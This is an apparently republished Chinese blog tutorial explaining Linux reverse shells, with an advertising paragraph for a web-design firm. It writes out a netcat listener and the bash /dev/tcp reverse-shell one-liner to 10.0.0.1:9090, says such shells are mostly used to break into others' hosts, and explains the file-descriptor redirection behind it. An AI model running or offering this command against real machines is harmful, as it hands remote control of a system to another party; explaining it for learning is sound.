Linux的反弹shell命令的解析
这篇文章主要介绍“Linux的反弹shell命令的解析”,在日常操作中,相信很多人在Linux的反弹shell命令的解析问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Linux的反弹shell命令的解析”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
专注于为中小企业提供网站建设、做网站服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业壶关免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了千余家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
1. 什么是反弹shell
简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。
2. 反弹shell的用途
这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙
3. 反弹shell操作步骤
3.1. 在本机开启端口9090
nc -lk 9090
3.2. 在需要被控制的机器上执行如下两种命令中的一种即可
bash -i >& /dev/tcp/10.0.0.1/9090 0>&1
3.3. 在本机刚才执行nc -lk 9090命令行下面输入需要被控制的主机的命令即可
4. 原理
A主机开启9090端口的tcp服务
B主机连接到A主机的9090的tcp服务
A主机通过tcp服务把命令发到B主机
B主机读取命令并且在bash中执行
B主机把执行结果发给A主机
这样就可以在A主机中'玩弄'B主机了
下面重点来了
我们看这个操作其实还是蛮简单的,但是我们不能只局限于表面。我们需要去了解它的原理
其实nc -lk 9090命令没什么可说的,百度google一搜就出来了。我们今天要去解释的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。这条命令在google也没搜出来什么结果。所以只能自己加夜班搞了。
inux shell下常用的文件描述符是:
标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
首先我们把这个命令拆解一下
bash -i # 这个也不知道说啥 >& # 这条命令 其实就是把stderr也输入到 stdout。它相当于 `> xxx 2>&1` /dev/tcp/10.0.0.1/9090 # 这个就是连接到10.0.0.1的9090端口 0>&1 # 这个在google百度上查了半天也没搞懂,只能去研究文档
其实前面3个命令组合在一起很好理解,就是把这个bash下的所有输出都发送到 10.0.0.1:9090。这个大家可以自己操作一下,去掉后面的 0>&1。
我们在命令里面写 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我们看下文件描述符
这里看到的是2>&1就是把文件描述符2对应的设备改成了文件描述符1对应的设备。那么同理 0>&1就是把 0对应的设备改成的1对应的设备,那也就是socket。这就表明了 stdin就是从socket中读取数据,然后再执行命令,把bash的命令行返回内容通过stdout发到socket。
其实这些内容都可以在bash的man pages里面找到
文档里面写的很清楚 n<&word 是吧word复制给n, n>&word是吧word复制给n。
所以这里写 0<&1 或者是 0>&1都是可以的,只要把文件描述符1对应的设备复制给文件描述符0就可以了
到此,关于“Linux的反弹shell命令的解析”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注创新互联网站,小编会继续努力为大家带来更多实用的文章!
分享文章:Linux的反弹shell命令的解析
本文来源:http://azwzsj.com/article/ihghce.html